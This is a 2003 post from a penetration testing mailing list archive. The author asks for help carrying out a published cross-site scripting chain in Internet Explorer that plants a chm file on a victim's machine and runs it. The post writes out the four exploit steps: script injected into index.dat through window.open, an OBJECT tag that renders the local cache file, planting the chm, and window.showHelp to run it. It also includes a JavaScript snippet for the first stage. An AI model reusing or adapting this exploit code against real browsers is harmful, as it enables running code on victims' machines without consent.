Penetration Testing mailing list archives
Testing Cross-Site Scripting to Inject and run malicious code
From: Indian Tiger <indiantiger () mailandnews com>
Date: Sat, 12 Apr 2003 11:41:45 -0400
Hi All,

I am testing Cross-Site Scripting to inject and run malicious code. I was following Georgi Guninski's advisory, which was published on 23 November 2000. Following this advisory, I am trying to inject some malicious file at the victim's machine & then to run that injected file. According to this advisory we have to perform the following four steps to inject some file & run that file:

1) Inject JavaScript in index.dat by
   window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
   The JavaScript is executed in index.dat and has access to its content, which allows finding the random directory names.

2) Parse/render index.dat by:
   <OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>

3) After the Temporary Internet Files folders are known, inject for example chm files by:
   <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>

4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");

I am clear up to the second step he has specified, but I am not clear with the third and fourth stages. The third stage is going to inject the chm1.chm file at the victim's machine, but it is not clear whether this file is situated at the victim's machine or the attacker's machine. Also, where will this file be stored at the victim's machine? This step also doesn't use the name of the random directories we have found in the 2nd step, so I don't know why the second step is required & how we can write JavaScript to find random folders from the index.dat file.
The code for injecting JavaScript into index.dat & displaying the content of the index.dat file is given as:

   <SCRIPT>
   b=window.open("http://10.10.10.10?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
   s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
   setTimeout("document.writeln(s)",10000);
   </SCRIPT>

This code should return the output of file index.dat into a new blank window, but when I tried this I didn't get the output of the index.dat file into a new window; instead I got the output of index.dat in the same window in which I had written this code. I think that to run the JavaScript stored in the index.dat file, first there is a need to create an object that captures all the contents of the index.dat file, and then we should create a new window & assign its inner HTML code to the contents of the object created. I don't know whether it makes sense or not, but I am trying to do something like that.

Any help on the above topics will be highly appreciated.

Thanking you,
Sincerely,
Indian Tiger, CISSP